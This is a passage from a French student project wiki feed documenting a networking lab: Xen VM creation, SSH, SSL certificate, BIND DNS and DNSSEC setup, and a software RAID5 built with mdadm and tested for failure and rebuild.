 ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
 ProxyPass / http://192.168.0.200:80&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.200:80&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
server 1 et 2 identique a part adresse IP:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:80&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:80&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 ServerAdmin webmaster@localhost&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
&lt;br /&gt;
 ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
 CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46643</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46643"/>
				<updated>2017-12-14T17:48:08Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Sécurisation et cryptage des données&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       '''ssh root@cordouan.insecserv.deule.net'''&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       '''xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie'''&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       '''xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg'''&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       '''root@cordouan:~# xl list'''&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       '''xl console IMA5-BANANE'''&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    '''ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179'''&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# vim /etc/ssh/sshd_config'''&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    '''root@IMA5-BANANE:~# service ssh restart'''&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commençons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr'''&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr'''&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# apt-get install postfix mailx'''&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs'''&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf''' &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2# cat ports.conf''' &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload'''&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local'''&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf'''&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space'''&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls'''&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       '''vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v'''&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       '''root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg'''&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    '''apt-get install mdadm'''&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    '''mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf'''&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/'''&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    '''/dev/md0 /datamd0'''&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/datamd0# vim raid5test.txt'''&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail /dev/md0'''&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail /dev/md0'''&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# ls /datamd0/'''&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
